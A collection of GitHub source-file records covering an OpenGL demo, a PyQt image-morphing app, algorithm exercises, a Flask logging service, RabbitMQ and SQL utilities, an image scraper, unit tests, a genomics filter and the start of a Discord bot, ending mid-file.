2 if env == 'Darwin' else windowsize[1], \n f\"{title} {version}\", \n None, \n None\n )\n make_context_current(window)\n #glutMouseFunc(on_click)\n set_mouse_button_callback(window, on_click)\n set_cursor_pos_callback(window, on_move)\n #glutPassiveMotionFunc()\n\n if env == 'Darwin':\n fb_width, fb_height = get_framebuffer_size(window)\n _x = -(windowsize[0] - fb_width) // 2\n _y = -(windowsize[1] - fb_height) // 2\n glViewport(_x, _y, windowsize[0], windowsize[1])\n else:\n glViewport(0, 0, windowsize[0], windowsize[1])\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho( 0, windowsize[0], 0, windowsize[1], 0, 10)\n glPixelZoom( 1, -1 )\n glRasterPos3f(0, windowsize[1], -0.3)\n while not window_should_close(window):\n glClearColor(0, 0, 0, 255)\n glClear(GL_COLOR_BUFFER_BIT)\n #newBuffer = update_buffer(__buffer)\n update_water(time, __buffer, False)\n glDrawPixels(*windowsize, GL_RGB, GL_UNSIGNED_BYTE, __buffer) # 임시로 __buffer를 전역으로 직접 수정하게끔 함.\n # 단, JIT 처리된 함수는 인자로 받아 수정\n swap_buffers(window)\n poll_events()\n time = time + 1 # 프레임 처리를 위함\n terminate()\n\nmain(\"Lesser Flower\", 1.1)\n","repo_name":"LOSAT/LesserFlower","sub_path":"src/old/old.py","file_name":"old.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28088657845","text":"import pytest\nfrom pytest_embedded import Dut\n\n\n@pytest.mark.esp32\n@pytest.mark.generic\ndef test_himem(dut: Dut) -> None:\n\n mem = dut.expect(r'esp_himem: Initialized. Using last \\d+ 32KB address blocks for bank '\n r'switching on (\\d+) KB of physical memory.').group(1).decode('utf8')\n\n dut.expect(r'Himem has {}KiB of memory, \\d+KiB of which is free.'.format(mem), timeout=10)\n dut.expect_exact('Testing the free memory...')\n dut.expect_exact('Done!')\n","repo_name":"espressif/esp-idf","sub_path":"examples/system/himem/pytest_himem.py","file_name":"pytest_himem.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":11541,"dataset":"github-code","pt":"3"} +{"seq_id":"31996367045","text":"##############################\n# Author: Maanus Gulia\n# email: mgulia@purdue.edu\n# ID: ee364b04\n# Date: 11/27/19\n##############################\n\nimport os\nimport sys\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QGraphicsScene\nfrom MorphingGUI import *\nfrom Morphing import *\nimport numpy as np\nfrom PIL import ImageQt, Image\nfrom MorphingGUI import *\nfrom PyQt5 import QtCore, QtGui\nimport imageio as im\n\n\nclass MorphingApp(QMainWindow, Ui_MainWindow):\n\n def __init__(self, parent=None):\n self.flag = 0\n super(MorphingApp, self).__init__(parent)\n self.setupUi(self)\n self.scene = None\n self.sceneLeft = None\n self.sceneRight = None\n self.objShowTriangle.setDisabled(True)\n self.right00.setDisabled(True)\n self.objButtonBlend.setDisabled(True)\n self.horizontalSlider.setDisabled(True)\n self.objLoadStartingImage.setEnabled(True)\n self.objLoadEndingImage.setEnabled(True)\n self.objLoadStartingImage.clicked.connect(self.loadDataLeft)\n self.objLoadEndingImage.clicked.connect(self.loadDataRight)\n self.leftTextPath = ''\n self.rightTextPath = ''\n self.leftPicPath = ''\n self.rightPicPath = ''\n self.leftFlag = False\n self.rightFlag = False\n self.toggleLR = False\n self.leftGreen = False\n self.rightGreen = False\n self.alphaVal = 0\n self.objShowTriangle.stateChanged.connect(self.showTriangles)\n self.objButtonBlend.clicked.connect(self.blendImage)\n self.objGraphicLeft.mousePressEvent = self.plottingPointsLeft\n self.objGraphicRight.mousePressEvent = self.plottingPointsRight\n self.mousePressEvent = self.clickedAnywhere\n self.keyPressEvent = self.backSpaceHelper\n self.backSpaceLeft = None\n self.backSpaceRight = None\n self.leftCoordX = []\n self.leftCoordY = []\n self.rightCoordX = []\n self.rightCoordY = []\n\n\n def loadDataLeft(self):\n filePath, _=QFileDialog.getOpenFileName(self, caption=\"Load Image Left\")\n if not filePath:\n return\n self.loadStart(filePath)\n\n\n def loadDataRight(self):\n filePath, _ = QFileDialog.getOpenFileName(self, caption=\"Load Image Right\")\n if not filePath:\n return\n self.loadEnd(filePath)\n\n\n def loadStart(self, filePath):\n self.leftScene = QGraphicsScene()\n self.leftScene.addPixmap(QPixmap(filePath))\n self.objGraphicLeft.setScene(self.leftScene)\n self.objGraphicLeft.fitInView(self.leftScene.sceneRect(), QtCore.Qt.KeepAspectRatio)\n\n self.leftFlag = True\n self.leftPicPath = filePath\n leftPointPath = filePath + '.txt'\n\n if (os.path.exists(leftPointPath)):\n self.leftTextPath = leftPointPath\n with open(self.leftTextPath, 'r') as FILE:\n dataFile = FILE.readlines()\n\n #wont work if operating on empty file with no points\n coordX = []\n coordY = []\n for idx, line in enumerate(dataFile):\n temp = line.split()\n coordX.append(temp[0])\n coordY.append(temp[1])\n\n for x, y in zip(coordX, coordY):\n self.leftScene.addEllipse(float(x), float(y), 15, 15, QtGui.QPen(QtCore.Qt.red), QtGui.QBrush(QtCore.Qt.red))\n\n self.bothLoaded()\n\n\n def loadEnd(self, filePath):\n self.rightScene = QGraphicsScene()\n self.rightScene.addPixmap(QPixmap(filePath))\n self.objGraphicRight.setScene(self.rightScene)\n self.objGraphicRight.fitInView(self.rightScene.sceneRect(), QtCore.Qt.KeepAspectRatio)\n self.rightFlag = True\n self.rightPicPath = filePath\n rightPointPath = filePath + '.txt'\n\n if (os.path.exists(rightPointPath)):\n self.rightTextPath = rightPointPath\n with open(rightPointPath, 'r') as FILE:\n dataFile = FILE.readlines()\n\n #wont work if operating on open file with no points\n coordX = []\n coordY = []\n for idx, line in enumerate(dataFile):\n temp = line.split()\n coordX.append(temp[0])\n coordY.append(temp[1])\n\n for x, y in zip(coordX, coordY):\n self.rightScene.addEllipse(float(x), float(y), 15, 15, QtGui.QPen(QtCore.Qt.red), QtGui.QBrush(QtCore.Qt.red))\n\n self.bothLoaded()\n\n\n def bothLoaded(self):\n if self.leftFlag and self.rightFlag:\n self.objButtonBlend.setEnabled(True)\n self.right00.setEnabled(True)\n self.horizontalSlider.setEnabled(True)\n self.horizontalSlider.valueChanged.connect(self.alphaBar)\n self.objShowTriangle.setEnabled(True)\n\n def alphaBar(self):\n num = self.horizontalSlider.value()/100\n num = round(num*2.0, 1) / 2.0\n self.right00.setText(str(num))\n self.alphaVal = num\n\n\n def showTriangles(self):\n #if self.objShowTriangle.isChecked() and os.path.exists(self.leftTextPath) and os.path.exists(self.rightTextPath):\n if self.objShowTriangle.isChecked() and os.path.exists(self.leftPicPath + '.txt') and os.path.exists(self.rightPicPath + '.txt'):\n\n self.leftTextPath = self.leftPicPath + '.txt'\n self.rightTextPath = self.rightPicPath + '.txt'\n\n leftTri, rightTri = loadTriangles(self.leftTextPath, self.rightTextPath)\n\n for x in leftTri:\n self.leftScene.addLine(x.vertices[0][0], x.vertices[0][1], x.vertices[1][0], x.vertices[1][1],\n QtGui.QPen(QtCore.Qt.red))\n self.leftScene.addLine(x.vertices[2][0], x.vertices[2][1], x.vertices[1][0], x.vertices[1][1],\n QtGui.QPen(QtCore.Qt.red))\n self.leftScene.addLine(x.vertices[2][0], x.vertices[2][1], x.vertices[0][0], x.vertices[0][1],\n QtGui.QPen(QtCore.Qt.red))\n\n for y in rightTri:\n self.rightScene.addLine(y.vertices[0][0], y.vertices[0][1], y.vertices[1][0], y.vertices[1][1],\n QtGui.QPen(QtCore.Qt.red))\n self.rightScene.addLine(y.vertices[2][0], y.vertices[2][1], y.vertices[1][0], y.vertices[1][1],\n QtGui.QPen(QtCore.Qt.red))\n self.rightScene.addLine(y.vertices[2][0], y.vertices[2][1], y.vertices[0][0], y.vertices[0][1],\n QtGui.QPen(QtCore.Qt.red))\n else:\n for obj in self.leftScene.items():\n if isinstance(obj, QtWidgets.QGraphicsLineItem):\n self.leftScene.removeItem(obj)\n\n for obj2 in self.rightScene.items():\n if isinstance(obj2, QtWidgets.QGraphicsLineItem):\n self.rightScene.removeItem(obj2)\n\n\n def blendImage(self):\n left, right = loadTriangles(self.leftTextPath, self.rightTextPath)\n leftTri = np.array(imageio.imread(self.leftPicPath), np.uint8)\n rightTri = np.array(imageio.imread(self.rightPicPath), np.uint8)\n objM = Morpher(leftTri, left, rightTri, right)\n targetImage = objM.getImageAtAlpha(self.alphaVal)\n self.bottomScene = QGraphicsScene()\n varImage = Image.fromarray(targetImage.astype(np.uint8))\n varQ = QtGui.QImage(ImageQt.ImageQt(varImage))\n show = QtGui.QPixmap.fromImage(varQ)\n self.bottomScene.addPixmap(QtGui.QPixmap(show))\n self.objGraphicsBottom.setScene(self.bottomScene)\n self.objGraphicsBottom.fitInView(self.bottomScene.sceneRect(), QtCore.Qt.KeepAspectRatio)\n\n\n def plottingPointsLeft(self, event):\n if self.toggleLR == False and os.path.exists(self.leftPicPath):\n var = self.objGraphicLeft.mapToScene(event.pos())\n self.backSpaceLeft = self.leftScene.addEllipse(var.x() - 10, var.y() - 10, 20, 20, QtGui.QPen(),\n QtGui.QBrush(QtCore.Qt.green))\n\n if self.leftGreen and self.rightGreen:\n self.leftScene.addEllipse(self.pointOnLeft.x() - 10, self.pointOnLeft.y() - 10, 20, 20, QtGui.QPen(), QtGui.QBrush(QtCore.Qt.blue))\n self.rightScene.addEllipse(self.pointOnRight.x() - 10, self.pointOnRight.y() - 10, 20, 20, QtGui.QPen(), QtGui.QBrush(QtCore.Qt.blue))\n self.leftGreen = False\n self.rightGreen = False\n self.addPointsToFile()\n else:\n self.leftGreen = True\n\n self.toggleLR = True\n self.leftGreen = True\n self.pointOnLeft = var\n\n\n def plottingPointsRight(self, event):\n if self.toggleLR and os.path.exists(self.rightPicPath):\n var = self.objGraphicRight.mapToScene(event.pos())\n self.backSpaceRight = self.rightScene.addEllipse(var.x() - 10, var.y() - 10, 20, 20, QtGui.QPen(),\n QtGui.QBrush(QtCore.Qt.green))\n self.toggleLR = False\n self.rightGreen = True\n self.pointOnRight = var\n\n\n def backSpaceHelper(self, event):\n var = event.key()\n if var == QtCore.Qt.Key_Backspace:\n\n if self.leftGreen and self.toggleLR:\n self.objGraphicLeft.scene().removeItem(self.backSpaceLeft)\n self.leftGreen = False\n self.toggleLR = False\n\n elif self.rightGreen and not self.toggleLR:\n self.objGraphicRight.scene().removeItem(self.backSpaceRight)\n self.rightGreen = False\n self.toggleLR = True\n\n\n def clickedAnywhere(self, event):\n if self.leftGreen and self.rightGreen:\n self.leftScene.addEllipse(self.pointOnLeft.x() - 10, self.pointOnLeft.y() - 10, 20, 20, QtGui.QPen(),\n QtGui.QBrush(QtCore.Qt.blue))\n self.rightScene.addEllipse(self.pointOnRight.x() - 10, self.pointOnRight.y() - 10, 20, 20, QtGui.QPen(),\n QtGui.QBrush(QtCore.Qt.blue))\n\n self.addPointsToFile()\n self.leftGreen = False\n self.rightGreen = False\n\n\n def addPointsToFile(self):\n xL = str(round(self.pointOnLeft.x(), 1))\n yL = str(round(self.pointOnLeft.y(), 1))\n xR = str(round(self.pointOnRight.x(), 1))\n yR = str(round(self.pointOnRight.y(), 1))\n\n xL = xL.rjust(8)\n yL = yL.rjust(8)\n xR = xR.rjust(8)\n yR = yR.rjust(8)\n\n with open(self.leftPicPath + '.txt', 'a+') as FILE_LEFT:\n FILE_LEFT.write(xL + yL + '\\n')\n\n with open(self.rightPicPath + '.txt', 'a+') as FILE_RIGHT:\n FILE_RIGHT.write(xR + yR + '\\n')\n\n self.showTriangles()\n\n\nif __name__==\"__main__\":\n currentApp = QApplication(sys.argv)\n currentForm = MorphingApp()\n\n currentForm.show()\n currentApp.exec_()","repo_name":"mgulia/GUI-Image-Blending-Morphing","sub_path":"MorphingApp.py","file_name":"MorphingApp.py","file_ext":"py","file_size_in_byte":11076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30316895134","text":"# Find a duplicate, Space Edition\n\n'''\nWe have a list of integers, where:\n\nThe integers are in the range 1..n\nThe list has a length of n+1\n\nIt follows that our list has at least one integer which appears at least twice. But it may have several duplicates, \nand each duplicate may appear more than twice.\n\nWrite a function which finds an integer that \nappears more than once in our list.\n'''\n\n'''\ndef find_repeat(numbers):\n numbers_seen = set()\n for number in numbers:\n if number in numbers_seen:\n return number\n else:\n numbers_seen.add(number)\n\n # Whoops--no duplicate\n raise Exception('no duplicate!')\n\nbut O(n) time and O(n) space\n'''\n\n'''\ndef find_repeat_brute_force(numbers):\n for needle in range(1, len(numbers)):\n has_been_seen = False\n for number in numbers:\n if number == needle:\n if has_been_seen:\n return number\n else:\n has_been_seen = True\n\n # Whoops--no duplicate\n raise Exception('no duplicate!')\n\nbut O(n^2) time and O(1) space\n'''\n\n'''\nSort the list and find the adjacent values\n\nbut O(nlgn) time and O(1) space\n'''\n\n'''\n1. Find the number of integers in our input list which lie within the range 1..n/2 \n2. Compare that to the number of possible unique integers in the same range\n3. If the number of actual integers is greater than the number of possible integers, \nwe know there’s a duplicate in the range 1..n/2, so we iteratively use the same approach on that range\n4. If the number of actual integers is not greater than the number of possible integers, we know \nthere must be duplicate in the range n/2 + 1..n, so we iteratively use the same approach on that range\n5. At some point, our range will contain just 1 integer, which will be our answer\n'''\n\ndef find_repeat(numbers):\n floor = 1\n ceiling = len(numbers) - 1\n\n while floor < ceiling:\n # Divide our range 1..n into an upper range and lower range\n # (such that they don't overlap)\n # Lower range is floor..midpoint\n # Upper range is midpoint+1..ceiling\n midpoint = floor + ((ceiling - floor) // 2)\n lower_range_floor, lower_range_ceiling = floor, midpoint\n upper_range_floor, upper_range_ceiling = midpoint+1, ceiling\n\n # Count number of items in lower range\n items_in_lower_range = 0\n for item in numbers:\n # Is it in the lower range?\n if item >= lower_range_floor and item <= lower_range_ceiling:\n items_in_lower_range += 1\n\n distinct_possible_integers_in_lower_range = (\n lower_range_ceiling\n - lower_range_floor\n + 1\n )\n if items_in_lower_range > distinct_possible_integers_in_lower_range:\n # There must be a duplicate in the lower range\n # so use the same approach iteratively on that range\n floor, ceiling = lower_range_floor, lower_range_ceiling\n else:\n # There must be a duplicate in the upper range\n # so use the same approach iteratively on that range\n floor, ceiling = upper_range_floor, upper_range_ceiling\n\n # Floor and ceiling have converged\n # We found a number that repeats!\n return floor\n\n# O(1) space and O(nlgn) time\n","repo_name":"dennikey/Interview-Cake","sub_path":"Interview Cake/Unit 4 Sorting, searching, and logarithms/find-repeat,space-edition.py","file_name":"find-repeat,space-edition.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"742645176","text":"\nfrom typing import List, Dict, Tuple\n\npiles_memory: Dict[int, int] = {0: 1}\n\n\ndef pentagonal(k):\n return (k * ((3 * k) - 1)) / 2\n\n\ndef all_partitions(coins: int) -> int:\n \"\"\"\n :param coins: overall coins we need to find the partition of to piles\n :return: amount of ways we can divide to piles\n \"\"\"\n global piles_memory\n\n if coins < 0:\n return 0\n\n if coins not in piles_memory.keys():\n k = 0\n next_partition_number = 1\n result = 0\n while next_partition_number > 0:\n k += 1\n for ii in [1, -1]:\n next_pentagonal = pentagonal(ii * k)\n next_partition_number = all_partitions(coins - next_pentagonal)\n result += ((-1) ** (k + 1)) * next_partition_number\n piles_memory[coins] = result % 1000000\n\n return piles_memory[coins]\n\n\ndef main():\n n = 1\n # amount = all_partitions(n)\n amount = 1\n while amount != 0:\n print(f\"n: {n}, partitions: {amount}\")\n n += 1\n amount = all_partitions(n)\n\n # The answer is n = 55374\n print(f\"n: {n}, partitions: {amount}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SagieSH/project_euler","sub_path":"src/euler078.py","file_name":"euler078.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2671044144","text":"import google.cloud.logging as logging\nimport base64\nimport ast\nimport os\nfrom datetime import datetime, timedelta\nfrom flask import Flask, request, Response\n\napp = Flask(__name__)\n\n\n@app.route(\"/log-sub\", methods=['POST'])\ndef process_data():\n req = request.get_json(silent=True)\n if not req:\n return Response(\"{'error': 'no Pub/Sub message received'}\", status=400, mimetype='application/json')\n if not isinstance(req, dict) or \"message\" not in req:\n return Response(\"{'error': 'invalid Pub/Sub message format'}\", status=400, mimetype='application/json')\n if not isinstance(req[\"message\"], dict) or \"data\" not in req[\"message\"]:\n return Response(\"{'error': 'no data in message received'}\", status=400, mimetype='application/json')\n content = base64.b64decode(req[\"message\"][\"data\"]).decode(\"utf-8\")\n content = ast.literal_eval(content)\n # action, memberId is must have\n now = (datetime.utcnow() + timedelta(hours = 8)).strftime(\"%Y.%m.%d %H:%M:%S\")\n if 'action' in content and content['action']:\n action = content['action']\n else:\n return Response(\"{'error': 'parameter error: action missing'}\", status=400, mimetype='application/json')\n \n if 'memberId' in content and content['memberId'] and content['memberId'] != 0:\n memberId = content['memberId']\n else:\n return Response(\"{'error': 'parameter error: memberId missing'}\", status=400, mimetype='application/json')\n\n if 'targetId' in content and content['targetId']:\n objId = content['targetId']\n elif 'commentId' in content and content['commentId']:\n objId = content['commentId']\n elif 'storyId' in content and content['storyId']:\n objId = content['storyId']\n elif 'collectionId' in content and content['collectionId']:\n objId = content['collectionId']\n else:\n objId = ''\n \n objective = content['objective'] if 'objective' in content and content['objective'] else ''\n uuid = content['UUID'] if 'UUID' in content and content['UUID'] else''\n clientOS = content['os'] if 'os' in content and content['os'] else ''\n version = content['version'] if 'version' in content and content['version'] else ''\n device = content['device'] if 'device' in content and content['device'] else ''\n \n project_id = os.environ['project_id']\n log_name = os.environ['log_name'] # readr-mesh-user-log-dev\n logger_name = f'projects/{project_id}/logs/{log_name}'\n resource = logging.Resource(type='global', labels={'project_id': project_id})\n clientInfo = {\n 'client-info':\n {\n 'current-runtime-start': now,\n 'datetime': now,\n 'exit-time': now,\n 'action': action,\n 'memberId': memberId,\n 'objId': objId,\n 'objective': objective\n },\n 'client-os': {\n 'UUID': uuid,\n 'name': clientOS,\n 'version': version,\n 'device name': device,\n }\n }\n logging_client = logging.Client()\n logger = logging_client.logger(logger_name)\n logger.log_struct(info = clientInfo, severity = \"INFO\", resource = resource, log_name = logger_name)\n return \"success\"\n\n\n@app.route(\"/\")\ndef healthcheck():\n return \"ok\"\n\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"yatiti84/mesh-subscriber","sub_path":"userlog_subscriber/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74552551442","text":"import os\nimport sys\nimport pika\nimport signal\nimport threading\n\ndef alert_and_crash(message):\n print(message)\n sys.stdout.flush()\n os._exit(1)\n\ndef get_parameters(blocked_connection_timeout=3600):\n # if RabbitMQ broker is low on resources, it can block connections\n # if blocked > 1 hour, drop the connection\n return pika.ConnectionParameters(\n host=os.getenv(\"RABBITMQ_HOST\"),\n port=os.getenv(\"RABBITMQ_PORT\", 5672),\n credentials=pika.PlainCredentials(\n os.getenv(\"RABBITMQ_USERNAME\"),\n os.getenv(\"RABBITMQ_PASSWORD\")\n ),\n blocked_connection_timeout=blocked_connection_timeout,\n )\n\nclass SigtermHandler:\n def __init__(self):\n self.sigterm_received = False\n self.lock = threading.Lock()\n self.condvar = threading.Condition(self.lock)\n signal.signal(signal.SIGTERM, self.signal_handler)\n\n def signal_handler(self, signum, stack_frame):\n with self.lock:\n self.sigterm_received = True\n self.condvar.notify()\n\n def wait_for_sigterm(self, timeout):\n with self.lock:\n self.condvar.wait(timeout)\n return self.sigterm_received\n\nsigterm_handler = SigtermHandler()\n\ndef wait_for_sigterm(timeout = None):\n return sigterm_handler.wait_for_sigterm(timeout)\n","repo_name":"madhur-tandon/lapinmq","sub_path":"lapinmq/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"71199071123","text":"#!/usr/bin/env python\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy_utils import database_exists, create_database\nfrom rich.console import Console\nfrom rich.progress import track\nimport numpy as np\nimport pandas as pd\nfrom scipy.linalg import eigh\n\n\n__all__ = [\"make_df\", \"to_sql\"]\n__author__ = \"big-o\"\n\n\nconsole = Console()\n\n\ndef _prepare_fields(flds):\n flds = flds.copy()\n\n for key in flds:\n fld = flds[key]\n if \"priors\" not in fld and fld.get(\"repeat\", True):\n vals = fld[\"values\"]\n # Create random priors for each value.\n p = np.random.normal(size=len(vals))\n # Softmax to get probabilities.\n priors = np.exp(p) / np.exp(p).sum()\n\n fld[\"priors\"] = priors\n\n return flds\n\n\ndef _make_row(flds, rownum):\n row = {\n name: np.random.choice(fld[\"values\"], p=fld[\"priors\"])\n for name, fld in flds.items()\n if fld.get(\"repeat\", True)\n }\n\n return row\n\n\ndef _validate_corr(corr):\n if not isinstance(corr, pd.DataFrame):\n raise ValueError(\"correlation matrix must be a pandas DataFrame.\")\n\n nflds = len(flds)\n if corr.shape != (nflds, nflds):\n raise ValueError(\n \"correlation matrix must be square and have one column/row for each field \"\n \"in your schema.\"\n )\n\n if not all(np.issubdtype(t, np.number) for t in corr.dtypes):\n raise ValueError(\"correlation matrix must be numeric.\")\n\n try:\n corr = corr[flds].loc[flds]\n except KeyError:\n raise ValueError(\n \"correlation matrix index and columns must be the field names for your \"\n \"schema.\"\n )\n\n if not np.allclose(corr, corr.T):\n raise ValueError(\"correlation matrix must be symmetric\")\n\n return corr\n\n\ndef make_df(table, size, fields, corr=None):\n \"\"\"\n Create a random dataframe that follows the specified schema.\n \"\"\"\n\n fields = _prepare_fields(fields)\n data = []\n\n # Generate\n try:\n for i in track(range(size), description=\"Generating data...\"):\n data.append(_make_row(fields, i))\n except KeyboardInterrupt:\n # Catch Ctrl+C to just truncate the dataframe.\n console.log(f\"[white on red]Truncating data at [bold]{len(data)}[/] rows.[/]\")\n\n df = pd.DataFrame(data)\n\n # Non-repeat fields weren't added. Add those now.\n for field, schema in fields.items():\n if not schema.get(\"repeat\", True):\n vals = list(schema[\"values\"])\n if size > len(vals):\n # Pad it out with a few NULLs\n vals = vals + [None] * (size - len(vals))\n\n # Use len(df) instead of size in case it was truncated.\n col = np.random.choice(vals, replace=False, size=len(df))\n df[field] = col\n\n # Reset the ordering\n flds = list(fields.keys())\n df = df[flds]\n\n # Alter the random values to add in any correlation if requested.\n if corr is not None:\n # corr must be a square dataframe with the indices and columns being the\n # fields.\n corr = _validate_corr(corr)\n\n # Compute the eigenvalues and eigenvectors.\n evals, evecs = eigh(corr)\n # Construct c, so c*c^T = corr.\n c = np.dot(evecs, np.diag(np.sqrt(evals)))\n\n # Convert the data to correlated random variables.\n df[:] = np.dot(c, df.values)\n\n sort_cols = [\n (fields[fld][\"sort\"], fld) for fld in fields if fields[fld].get(\"sort\", False)\n ]\n if len(sort_cols) > 0:\n sort_cols.sort()\n sort_cols = [f[1] for f in sort_cols]\n df.sort_values(sort_cols, inplace=True)\n\n df.name = table\n return df\n\n\ndef to_sql(df, url, db, if_exists):\n \"\"\"\n Write the contents of a dataframe to a SQL database.\n \"\"\"\n engine = create_engine(url, pool_recycle=3600)\n conn = engine.connect()\n\n # conn.execute(f\"CREATE DATABASE IF NOT EXISTS {db}\")\n # conn.execute(f\"USE {db}\")\n if not database_exists(url):\n create_database(url)\n\n if if_exists == \"replace\":\n # Bug workaround\n conn.execute(f\"DROP TABLE IF EXISTS {df.name}\")\n\n frame = df.to_sql(df.name, conn, index=False, if_exists=if_exists)\n\n conn.close()\n\n console.log(\n f\"Table [bold magenta]`{db}:{df.name}'[/] created successfully. \"\n f\"Uploaded [italic red]{len(df)}[/] rows.\"\n )\n","repo_name":"big-o/toolbox","sub_path":"datagen/datagen/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11876011628","text":"import requests\r\nfrom urllib import request\r\nfrom lxml import etree\r\nimport re\r\n\r\n#确定种子URL\r\nbase_url = 'http://bing.plmeizi.com/'\r\n#请求基本页面\r\nresponse = requests.get(base_url)\r\n#初步解析\r\ntext = response.content.decode('utf-8')\r\nhtml = etree.HTML(text)\r\n\r\n#建立URL队列\r\nimgs = html.xpath('//div[@class=\"list \"]//img')\r\n#基于URL队列:1.提取了每张图片的URL,2.提取了图片的中文说明,3.确定图片名称,4.对每个URL地址,进行图片的请求和本地保存。\r\nfor img in imgs:\r\n img_url = re.sub(r'-listpic','',img.get('src'))\r\n img_illustrate = re.findall(r'(.*?)\\s\\(.*?\\)',img.get('alt'))[0]\r\n img_filename = img_illustrate + '.jpg'\r\n request.urlretrieve(img_url,'Bing_每日美图/' + img_filename)","repo_name":"cleanworld123/Python3_Spider_Practice","sub_path":"Python3_Spider_Junior/CH01/1.2.py","file_name":"1.2.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12184562702","text":"\"\"\"\nUnit tests for the CloudClient\n\n\n\"\"\"\n\n\nfrom cloudadapter.cloud.client.connections._connection import Connection\nfrom cloudadapter.cloud.client.messengers._messenger import Messenger\nfrom cloudadapter.cloud.client.handlers._handler import Handler\nfrom cloudadapter.cloud.client.cloud_client import CloudClient\n\nimport datetime\n\nimport unittest\nimport mock\n\n\nclass TestCloudClient(unittest.TestCase):\n\n def setUp(self):\n self.mock_connection = mock.create_autospec(Connection)\n self.mock_telemetry = mock.create_autospec(Messenger)\n self.mock_attribute = mock.create_autospec(Messenger)\n self.mock_event = mock.create_autospec(Messenger)\n self.mock_handler = mock.create_autospec(Handler)\n\n self.cloud_client = CloudClient(\n connection=self.mock_connection,\n telemetry=self.mock_telemetry,\n event=self.mock_event,\n attribute=self.mock_attribute,\n handler=self.mock_handler\n )\n\n def test_publish_telemetry_succeeds(self):\n args = (\"key\", \"value\", datetime.datetime.utcnow())\n self.cloud_client.publish_telemetry(*args)\n assert self.mock_telemetry.publish.call_count == 1\n\n def test_publish_attribute_succeeds(self):\n args = (\"key\", \"value\")\n self.cloud_client.publish_attribute(*args)\n assert self.mock_attribute.publish.call_count == 1\n\n def test_publish_event_succeeds(self):\n args = (\"key\", \"value\")\n self.cloud_client.publish_event(*args)\n assert self.mock_event.publish.call_count == 1\n\n def test_bind_callback_succeeds(self):\n args = (\"name\", lambda **_: None)\n self.cloud_client.bind_callback(*args)\n assert self.mock_handler.bind.call_count == 1\n\n def test_connect_succeeds(self):\n self.cloud_client.connect()\n assert self.mock_connection.start.call_count == 1\n\n def test_disconnect_succeeds(self):\n self.cloud_client.disconnect()\n assert self.mock_connection.stop.call_count == 1\n","repo_name":"intel/intel-inb-manageability","sub_path":"inbm/cloudadapter-agent/tests/unit/cloud/client/test_cloud_client.py","file_name":"test_cloud_client.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"3"} +{"seq_id":"32249848430","text":"import sys\n\ndef refBase_filter(fileName):\n data = open(fileName, 'rU').readlines()\n fhoutname = fileName[:-4]+'_refbase_filtered.csv'\n\n fhout = open(fhoutname, 'w')\n\n fhout.write(data[0])\n\n for each in data[1:]:\n flds = each.strip().split(',')\n if check_af(flds[-9:]):\n fhout.write(each)\n\n fhout.close()\n\n\ndef check_af(af):\n\n for each in af:\n if (len(each)>0) and (float(each)==1.0):\n return True # if any of the ref_base (allele freq of reference base) is 1.0, then we return True, and that line included in the output\n\n return False\n\n\ndef main():\n fileName = sys.argv[1]\n refBase_filter(fileName)\n\nif __name__ == '__main__':\n main()\n","repo_name":"singhalg/gsinghal_python_src","sub_path":"Cancer_Genomics/refBase_filter.py","file_name":"refBase_filter.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"39126163549","text":"import os\nimport discord\nfrom dotenv import load_dotenv\nfrom discord.utils import get\nfrom discord.ext import commands, tasks\nimport re\nimport random\nimport datetime\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\nclient = discord.Client()\n\n# Channel IDs:\n# id=796051477738684428 // wichtelchat\n# id=796376465741840444 // bot-test\n# id=796393926826655754 // geburtsdaten\n# id=796390311168835607 // wanderwichtelanmeldung\n\n#Initialisiert den Bot und die Variablen zum Programmstart\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\n # Channeldefinition\n global channel_wichtelchat\n global channel_bot_test\n global channel_geburtsdaten\n global channel_wanderwichtelanmeldung\n global channel_wichtelBotBefehle\n global birthdayList\n\n channel_wichtelchat = client.get_channel(796051477738684428)\n channel_bot_test = client.get_channel(796376465741840444)\n channel_geburtsdaten = client.get_channel(796393926826655754)\n channel_wanderwichtelanmeldung = client.get_channel(796390311168835607)\n channel_wichtelBotBefehle = client.get_channel(796441844933460059)\n birthdayList = [[],[],[]] # [0] name, [1] birthday, [2] giftbringer\n # check_for_birthdays_once_a_day.start()\n\n# Automatische Erinnerung\n#@tasks.loop(hours=24)\n#async def check_for_birthdays_once_a_day():\n# curDate = datetime.now()\n# curDate = curDate.strftime(\"%d.%m\")\n# print(curDate)\n\n# for birthday in birthdayList[1]:\n# print(str(birthday - curDate))\n \n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n # Debug zum Connectioncheck\n if message.content == 'Hi':\n await message.channel.send(\"Ho\")\n\n # Nachrichten 